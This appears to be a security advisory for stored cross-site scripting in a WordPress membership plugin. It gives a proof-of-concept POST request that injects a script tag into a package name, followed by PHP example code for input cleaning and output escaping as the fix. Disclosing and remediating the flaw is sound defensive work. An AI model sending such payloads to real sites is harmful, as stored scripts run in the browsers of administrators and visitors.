Description
Once registered, a user can add new subscription packages or modify existing ones. Package details are saved to the database without any sanitization, which allows a malicious user to include JavaScript code in the package name and/or package description.
PoC
- Send a POST request to http://vuln.site.tld/wp-admin/admin-ajax.php with data: action=package_add_new&p_name=a<script>alert(1)</script>
- Visit http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership as admin, or go to the front-end page that contains package information.
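
The sanitization missing per the Description, together with the matching output encoding, shown as an added example that is not the plugin's own code. All function names are hypothetical, and the input is the p_name value from the PoC above.

```php
<?php
// Added example: standalone PHP, runs with `php file.php`, no WordPress needed.
// Inside a plugin, sanitize_text_field() and esc_html() fill the same two roles.

// Behaviour described above: the stored value is echoed into the page as-is.
function render_row_unsafe(string $name): string {
    return '<tr><td>' . $name . '</td></tr>';
}

// Input side: reduce a package field to plain single-line text before saving.
function clean_package_text(string $raw): string {
    $text = strip_tags($raw);                                // remove markup
    $text = preg_replace('/[\x00-\x1F\x7F]+/', ' ', $text);  // control bytes
    return trim(preg_replace('/ {2,}/', ' ', $text));        // collapse spaces
}

// Output side: encode for an HTML text context, whatever the database holds.
function render_row_safe(string $name): string {
    $encoded = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<tr><td>' . $encoded . '</td></tr>';
}

// p_name value taken from the PoC request on this page.
$p_name = 'a<script>alert(1)</script>';

echo "unsafe, raw value:      ", render_row_unsafe($p_name), "\n";
echo "escaped, raw value:     ", render_row_safe($p_name), "\n";
echo "escaped, cleaned value: ", render_row_safe(clean_package_text($p_name)), "\n";
```

Rows saved before input cleaning was introduced still hold markup, so the output-side encoding is what protects the admin and front-end views for existing data.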